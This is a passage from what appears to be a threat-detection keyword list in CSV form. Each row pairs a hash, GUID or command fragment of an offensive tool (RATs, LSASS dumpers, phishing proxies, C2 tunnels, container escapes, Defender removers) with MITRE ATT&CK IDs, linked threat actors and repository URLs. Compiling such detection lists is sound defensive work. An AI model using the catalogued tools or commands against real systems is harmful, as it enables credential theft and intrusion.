"*cd754d69179c52ea3033cbd92addb351f098e231783733919fede70a8e4b2068*",".{0,1000}cd754d69179c52ea3033cbd92addb351f098e231783733919fede70a8e4b2068.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","37871" "*cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94*",".{0,1000}cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37872" "*cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94*",".{0,1000}cd7e4cd71cb803de24f7b8fc6c6946f96e9b9a95dd3c0888309b42446ba87b94.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","37873" "*cd8055713f9f9249efa639e6c2b7c2db71a801de209f74872ef4112a7bf6103f*",".{0,1000}cd8055713f9f9249efa639e6c2b7c2db71a801de209f74872ef4112a7bf6103f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37874" "*cd8373622b262e9039a6a6ac47046dc6a50464efb807200e7189f7674e0325dd*",".{0,1000}cd8373622b262e9039a6a6ac47046dc6a50464efb807200e7189f7674e0325dd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37875" "*cd85f727429b678fa89ce8d29e520afaa90dc89ff671d740544bb4103d4d7a5a*",".{0,1000}cd85f727429b678fa89ce8d29e520afaa90dc89ff671d740544bb4103d4d7a5a.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37877" "*cd8a7916f5beb7a221186784fe7b0b2c4cd01104d699e78bef786b0f9ccf6640*",".{0,1000}cd8a7916f5beb7a221186784fe7b0b2c4cd01104d699e78bef786b0f9ccf6640.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37878" "*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","37880" "*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","37881" "*CD8FD3D4-15FD-489C-A334-91F551B98022*",".{0,1000}CD8FD3D4\-15FD\-489C\-A334\-91F551B98022.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#GUIDproject","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","37882" 
"*cd92c3c752202b095097b1f2236ed579c473e8da86b6c2928dd0690cee42ab33*",".{0,1000}cd92c3c752202b095097b1f2236ed579c473e8da86b6c2928dd0690cee42ab33.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37883" "*cd93c81596eeaa53c9d68afb8a2e6d348ed2401008f95014b86591041632b093*",".{0,1000}cd93c81596eeaa53c9d68afb8a2e6d348ed2401008f95014b86591041632b093.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37884" "*cd988660fb5f3e0e19236f091fde0b5a154c48070c46bbe7e8cd28bb5a94017a*",".{0,1000}cd988660fb5f3e0e19236f091fde0b5a154c48070c46bbe7e8cd28bb5a94017a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37885" "*cd9c66c8-8fcb-4d43-975b-a9c8d02ad090*",".{0,1000}cd9c66c8\-8fcb\-4d43\-975b\-a9c8d02ad090.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#GUIDproject","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","37886" "*cd9c7992a24b65ca21c6f89bf538d396ce057caeffa46f869f0c860d067743c5*",".{0,1000}cd9c7992a24b65ca21c6f89bf538d396ce057caeffa46f869f0c860d067743c5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37887" "*cd9cc854525e7c75ff146697f8856ead7e1a9a739ab3575cc598eccca1aec680*",".{0,1000}cd9cc854525e7c75ff146697f8856ead7e1a9a739ab3575cc598eccca1aec680.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash 
#linux","N/A","5","","N/A","","","","37888" "*cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514*",".{0,1000}cdac5cd3d0ff424315da3e233a79f72663c26e53fc4ac2e5031ea08154630514.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37889" "*cdaebe0f3e4166ba3c1575c01ee614e6d2492722e395b60414aed79ef59d84ba*",".{0,1000}cdaebe0f3e4166ba3c1575c01ee614e6d2492722e395b60414aed79ef59d84ba.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37890" "*cdaee04229c5aefdb806af27910f34d3*",".{0,1000}cdaee04229c5aefdb806af27910f34d3.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","37891" "*cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696*",".{0,1000}cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37893" "*cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3*",".{0,1000}cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37894" "*cdbf8f32f74fdb65c2a34bfbf7208e24f0c9cc058d76fed96289964fcff50e2a*",".{0,1000}cdbf8f32f74fdb65c2a34bfbf7208e24f0c9cc058d76fed96289964fcff50e2a.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","37896" "*cdc1690245f3c8749c1ee9744540aa4df2b784f69cb425a967249c057b9799e8*",".{0,1000}cdc1690245f3c8749c1ee9744540aa4df2b784f69cb425a967249c057b9799e8.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of 
GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37897" "*CDC35DDA09316ABD091D51CF9EE78DECE9216ABB9F09FC2CDF4EB36E4971AB3C*",".{0,1000}CDC35DDA09316ABD091D51CF9EE78DECE9216ABB9F09FC2CDF4EB36E4971AB3C.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37898" "*CDC4F57A-A3F7-459B-87BF-6219DADF6284*",".{0,1000}CDC4F57A\-A3F7\-459B\-87BF\-6219DADF6284.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","37899" "*cdc7e13638e63b48b6489c35824ee07af51fbc5b0231e220c993f95d4554b673*",".{0,1000}cdc7e13638e63b48b6489c35824ee07af51fbc5b0231e220c993f95d4554b673.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37900" "*cdcb96e58514e182d0799884b64872caff34ed0eb552d842015941a7540347e7*",".{0,1000}cdcb96e58514e182d0799884b64872caff34ed0eb552d842015941a7540347e7.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","37901" "*cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50*",".{0,1000}cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","37902" "*cdd738401073d7c2c6b919b1a97e136c12467c6ccfbdc1f8b55baa67e4f9afe7*",".{0,1000}cdd738401073d7c2c6b919b1a97e136c12467c6ccfbdc1f8b55baa67e4f9afe7.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","37905" "*cdda315a5a89bad7451e3f921c57c16cf0d121f2599e1d5595be995ddb4836a3*",".{0,1000}cdda315a5a89bad7451e3f921c57c16cf0d121f2599e1d5595be995ddb4836a3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37906" 
"*cddd9cbec4525bc73c44a2c154b12372210e9ccedb9cafd7c495a590c481f6a8*",".{0,1000}cddd9cbec4525bc73c44a2c154b12372210e9ccedb9cafd7c495a590c481f6a8.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#filehash","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","37907" "*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*",".{0,1000}cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","37909" "*cde13befb711bf876f0952b847bf8d5e0cc58f6ce208ae54be29411a877f158d*",".{0,1000}cde13befb711bf876f0952b847bf8d5e0cc58f6ce208ae54be29411a877f158d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37911" "*cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb*",".{0,1000}cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral 
Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","37913" "*cde5c0d1b934fbec6b40a6f26c383ac926f27f8f00937313699d2ef5bf671da2*",".{0,1000}cde5c0d1b934fbec6b40a6f26c383ac926f27f8f00937313699d2ef5bf671da2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37914" "*cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af*",".{0,1000}cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37915" "*cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1*",".{0,1000}cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37916" "*cdimage.kali.org/*",".{0,1000}cdimage\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","37917" "*CDK auto exploit via K8s backdoor daemonset*",".{0,1000}CDK\sauto\sexploit\svia\sK8s\sbackdoor\sdaemonset.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#content","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37918" "*cdk run mount-cgroup *shell-cmd-payloads*",".{0,1000}cdk\srun\smount\-cgroup\s.{0,1000}shell\-cmd\-payloads.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37919" "*cdk-fabric run service-probe 127.0.0.1*",".{0,1000}cdk\-fabric\srun\sservice\-probe\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37920" "*cdk-team/CDK*",".{0,1000}cdk\-team\/CDK.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37921" "*cdn_proxy cloudflare ",".{0,1000}cdn_proxy\scloudflare\s","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37923" "*cdn_proxy_burp_ext.py*",".{0,1000}cdn_proxy_burp_ext\.py.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37924" "*cdn-proxy -*",".{0,1000}cdn\-proxy\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37925" "*cdn-proxy cloudfront *",".{0,1000}cdn\-proxy\scloudfront\s.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37926" "*cdn-proxy.git*",".{0,1000}cdn\-proxy\.git.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37927" "*cdn-proxy/burp_extension*",".{0,1000}cdn\-proxy\/burp_extension.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37928" "*Cdn-Proxy-Host*",".{0,1000}Cdn\-Proxy\-Host.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37929" "*Cdn-Proxy-Origin*",".{0,1000}Cdn\-Proxy\-Origin.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37930" "*cdn-scanner 
-*",".{0,1000}cdn\-scanner\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","37931" "*ce07cff17e7a4c5ee5331823d8e664013500cf83e6783d720ad7f09160712229*",".{0,1000}ce07cff17e7a4c5ee5331823d8e664013500cf83e6783d720ad7f09160712229.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37932" "*ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e*",".{0,1000}ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 